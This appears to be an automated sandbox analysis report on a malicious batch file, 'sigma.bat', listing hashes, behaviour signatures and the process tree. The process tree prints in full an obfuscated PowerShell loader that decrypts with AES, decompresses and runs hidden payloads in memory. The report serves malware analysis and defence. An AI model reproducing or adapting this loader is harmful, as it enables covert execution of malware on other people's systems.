Analysis
-
max time kernel
15s -
max time network
17s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
09-11-2024 14:32
Static task
static1
Behavioral task
behavioral1
Sample
sigma.bat
Resource
win7-20241010-en
5 signatures
150 seconds
General
-
Target
sigma.bat
-
Size
467KB
-
MD5
820debc2f4f0c9222c455ad0befb35ca
-
SHA1
2f64b6503ac7e19c37d2556c5a8096b593b152d3
-
SHA256
722075c841ad49931e716a80a1ba276b325ee7eb7062e295140107ac73b4f9ec
-
SHA512
c713b74b0163483a53454cfdbdf6a005950d0bf1e044698c93bfeb2e9fed2866fef0c17d5b7b6573dec062b1edcdc3e3eb8574c74a0beaeb370466d1c250d744
-
SSDEEP
12288:vTCh8WuzcDLPRPcIA7ewthD6ERekdWYb9ACXrjuJYD5S9J:7sBut/thDZUirA2rvD49J
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2156 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2156 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2156 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2500 wrote to memory of 1232 2500 cmd.exe 31 PID 2500 wrote to memory of 1232 2500 cmd.exe 31 PID 2500 wrote to memory of 1232 2500 cmd.exe 31 PID 1232 wrote to memory of 2592 1232 net.exe 32 PID 1232 wrote to memory of 2592 1232 net.exe 32 PID 1232 wrote to memory of 2592 1232 net.exe 32 PID 2500 wrote to memory of 2156 2500 cmd.exe 33 PID 2500 wrote to memory of 2156 2500 cmd.exe 33 PID 2500 wrote to memory of 2156 2500 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\sigma.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2592
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAX32kKNIA57v2PtuvPcK8ir8QplMdCOor3YMSiLeTU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wF3c9IhrNPKw6p+lQ8lg3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KImyR=New-Object System.IO.MemoryStream(,$param_var); $RDOIU=New-Object System.IO.MemoryStream; $XQVZK=New-Object System.IO.Compression.GZipStream($KImyR, [IO.Compression.CompressionMode]::Decompress); $XQVZK.CopyTo($RDOIU); $XQVZK.Dispose(); $KImyR.Dispose(); $RDOIU.Dispose(); $RDOIU.ToArray();}function execute_function($param_var,$param2_var){ $VtPlg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DmKAS=$VtPlg.EntryPoint; $DmKAS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sigma.bat';$GjSSJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sigma.bat').Split([Environment]::NewLine);foreach ($Rmxqb in $GjSSJ) { if ($Rmxqb.StartsWith(':: ')) { $CZpHS=$Rmxqb.Substring(3); break; }}$payloads_var=[string[]]$CZpHS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156
-